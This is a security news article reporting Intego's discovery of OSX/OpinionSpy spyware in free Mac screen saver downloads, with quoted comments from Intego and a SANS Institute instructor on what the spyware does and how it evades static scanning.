Article

Malware discovered in freely distributed Mac applications

Robert Westervelt

This malware ... passes most static scan tests -- the downloaded software itself is clean, the malware is downloaded as part of the installation process.
Rob VandenBrink
SANS Institute instructor
Researchers at antivirus vendor Intego are warning about a new piece of malware being distributed primarily in freely available screen saver programs. The spyware application dubbed OSX/OpinionSpy

Requires Free Membership to View

can scan files, record user activity and send stolen data to remote servers.

Austin, Texas-based Intego specializes in security software for Apple Macintosh computers. The malware is not new. Previous versions have been detected on Windows machines. It is served up with some applications as a tool for marketing purposes, but Intego said its actions classify it as a serious security threat.

The applications containing the spyware are freely available via popular download sites including MacUpdate, VersionTracker and Softpedia. A victim would not notice that the malware was being downloaded and once on the machine, the spyware is difficult to detect.

"The information provided with some of these applications contains a misleading text that users must accept explaining that a 'market research' program is installed with them, but not all of these specify this. Some of these programs are also distributed directly from developers' websites with no such warning," Intego said in an alert issued on the company blog.

Security experts have pointed out that a common misconception has been long held that Macintosh and Linux-based machines are more secure than Windows-based PCs. While Windows machines are targeted more often by attackers, due to their much higher market share, the Mac OS, based on UNIX and Linux-based operating systems contain vulnerabilities that could be targeted to steal sensitive data and perform other malicious tasks.

Apple has responded by adding antivirus features, though not full-fledged, to Mac OS X Snow Leopard. The software giant has also added some other security features, such as sandboxing, to isolate applications from the underlying operating system processes. In addition to Intego, many of security vendors including Symantec and McAfee sell Mac versions of their antivirus programs.

The OSX/OpinionSpy spyware opens a backdoor, enabling the malware to contact remote servers to upload data. The backdoor enables those behind the malware to automatically update it with new features with no user intervention.

Intego said it is unclear what data it copies and sends to the servers. The malware sniffs local network packets to potentially collect data. It scans local and network volumes and could potentially harvest user names and passwords, credit card numbers and other sensitive data. The malware also injects code into the user's browsers and the Apple iChat application. The behavior is similar to a virus.

"This malware 'infects' applications when they are running to be able to carry out its operations. (It infects the applications' code in the Mac's memory, and does not infect the actual applications' files on the user's hard disk," Intego said.

The antivirus vendor said it has also detected a second Mac-based spyware program believed to be a variant of OSX/OpinionSpy.

Security expert and SANS Institute instructor, Rob VandenBrink, writing on the SANS Internet Storm Center Diary, said the malware is a simple bolt-on and can be easily added to other freely downloadable applications. The malware is a small java/php app named mac_flv_to_mp3.php, he wrote.

"The neat thing about this malware is that it passes most static scan tests - the downloaded software itself is clean, the malware is downloaded as part of the installation process," VandenBrink wrote. "This highlights the requirement for an on-access virus scanner for your OSX computers."